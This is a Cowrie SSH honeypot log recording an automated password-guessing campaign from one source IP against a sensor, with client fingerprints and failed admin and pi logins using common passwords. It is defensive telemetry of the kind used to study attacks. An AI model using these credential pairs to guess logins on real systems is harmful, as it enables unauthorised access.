{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:00.372403Z","src_ip":"87.120.191.13","session":"8e384befce76"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":45006,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f78d2d57725","protocol":"ssh","message":"New connection: 87.120.191.13:45006 (1.2.3.4:22) [session: 1f78d2d57725]","sensor":"my-vps","timestamp":"2025-08-26T01:54:00.391404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:00.392817Z","src_ip":"87.120.191.13","session":"1f78d2d57725"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:00.413814Z","src_ip":"87.120.191.13","session":"1f78d2d57725"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567","message":"login attempt [admin/1234567] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:00.474816Z","src_ip":"87.120.191.13","session":"1f78d2d57725"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:00.494547Z","src_ip":"87.120.191.13","session":"fdf7eb869803"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":45022,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0b94887befc","protocol":"ssh","message":"New connection: 87.120.191.13:45022 (1.2.3.4:22) [session: f0b94887befc]","sensor":"my-vps","timestamp":"2025-08-26T01:54:00.518548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:00.519311Z","src_ip":"87.120.191.13","session":"f0b94887befc"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:00.539122Z","src_ip":"87.120.191.13","session":"f0b94887befc"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234567","message":"login attempt [pi/1234567] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:00.603926Z","src_ip":"87.120.191.13","session":"f0b94887befc"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:01.497413Z","src_ip":"87.120.191.13","session":"1f78d2d57725"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":45030,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6dda8d2af2d","protocol":"ssh","message":"New connection: 87.120.191.13:45030 (1.2.3.4:22) [session: e6dda8d2af2d]","sensor":"my-vps","timestamp":"2025-08-26T01:54:01.517414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:01.518916Z","src_ip":"87.120.191.13","session":"e6dda8d2af2d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:01.539264Z","src_ip":"87.120.191.13","session":"e6dda8d2af2d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssw0rd","message":"login attempt [admin/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:01.609468Z","src_ip":"87.120.191.13","session":"e6dda8d2af2d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:01.626955Z","src_ip":"87.120.191.13","session":"f0b94887befc"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":45040,"dst_ip":"1.2.3.4","dst_port":22,"session":"f93a5e05c6dc","protocol":"ssh","message":"New connection: 87.120.191.13:45040 (1.2.3.4:22) [session: f93a5e05c6dc]","sensor":"my-vps","timestamp":"2025-08-26T01:54:01.646285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:01.647120Z","src_ip":"87.120.191.13","session":"f93a5e05c6dc"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:01.671918Z","src_ip":"87.120.191.13","session":"f93a5e05c6dc"}
{"eventid":"cowrie.login.failed","username":"pi","password":"P@ssw0rd","message":"login attempt [pi/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:01.735779Z","src_ip":"87.120.191.13","session":"f93a5e05c6dc"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:02.636410Z","src_ip":"87.120.191.13","session":"e6dda8d2af2d"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":45042,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb536026115e","protocol":"ssh","message":"New connection: 87.120.191.13:45042 (1.2.3.4:22) [session: fb536026115e]","sensor":"my-vps","timestamp":"2025-08-26T01:54:02.670165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:02.712133Z","src_ip":"87.120.191.13","session":"fb536026115e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:02.712847Z","src_ip":"87.120.191.13","session":"fb536026115e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:02.794428Z","src_ip":"87.120.191.13","session":"f93a5e05c6dc"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":45050,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3ce38ccff49","protocol":"ssh","message":"New connection: 87.120.191.13:45050 (1.2.3.4:22) [session: d3ce38ccff49]","sensor":"my-vps","timestamp":"2025-08-26T01:54:02.818395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:02.856477Z","src_ip":"87.120.191.13","session":"d3ce38ccff49"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:02.857145Z","src_ip":"87.120.191.13","session":"d3ce38ccff49"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:02.911318Z","src_ip":"87.120.191.13","session":"fb536026115e"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234","message":"login attempt [pi/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:03.087764Z","src_ip":"87.120.191.13","session":"d3ce38ccff49"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:04.032942Z","src_ip":"87.120.191.13","session":"fb536026115e"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":48212,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a5c043b3db6","protocol":"ssh","message":"New connection: 87.120.191.13:48212 (1.2.3.4:22) [session: 0a5c043b3db6]","sensor":"my-vps","timestamp":"2025-08-26T01:54:04.074815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:04.171817Z","src_ip":"87.120.191.13","session":"0a5c043b3db6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:04.172581Z","src_ip":"87.120.191.13","session":"0a5c043b3db6"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:04.210545Z","src_ip":"87.120.191.13","session":"d3ce38ccff49"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":48222,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fd99672eca4","protocol":"ssh","message":"New connection: 87.120.191.13:48222 (1.2.3.4:22) [session: 3fd99672eca4]","sensor":"my-vps","timestamp":"2025-08-26T01:54:04.253674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:04.370984Z","src_ip":"87.120.191.13","session":"3fd99672eca4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:04.371809Z","src_ip":"87.120.191.13","session":"3fd99672eca4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"brigante","message":"login attempt [admin/brigante] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:04.711426Z","src_ip":"87.120.191.13","session":"0a5c043b3db6"}
{"eventid":"cowrie.login.failed","username":"pi","password":"brigante","message":"login attempt [pi/brigante] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:04.913253Z","src_ip":"87.120.191.13","session":"3fd99672eca4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:05.790932Z","src_ip":"87.120.191.13","session":"0a5c043b3db6"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":48378,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8a59c74d336","protocol":"ssh","message":"New connection: 87.120.191.13:48378 (1.2.3.4:22) [session: e8a59c74d336]","sensor":"my-vps","timestamp":"2025-08-26T01:54:05.833264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:05.901336Z","src_ip":"87.120.191.13","session":"e8a59c74d336"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:05.902983Z","src_ip":"87.120.191.13","session":"e8a59c74d336"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:05.982010Z","src_ip":"87.120.191.13","session":"3fd99672eca4"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":48386,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8d040af09a1","protocol":"ssh","message":"New connection: 87.120.191.13:48386 (1.2.3.4:22) [session: d8d040af09a1]","sensor":"my-vps","timestamp":"2025-08-26T01:54:06.016580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:06.064241Z","src_ip":"87.120.191.13","session":"d8d040af09a1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:06.064883Z","src_ip":"87.120.191.13","session":"d8d040af09a1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"samar","message":"login attempt [admin/samar] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:06.178900Z","src_ip":"87.120.191.13","session":"e8a59c74d336"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:07.479046Z","src_ip":"87.120.191.13","session":"e8a59c74d336"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":48518,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b66e805d816","protocol":"ssh","message":"New connection: 87.120.191.13:48518 (1.2.3.4:22) [session: 0b66e805d816]","sensor":"my-vps","timestamp":"2025-08-26T01:54:07.521653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:07.867239Z","src_ip":"87.120.191.13","session":"0b66e805d816"}
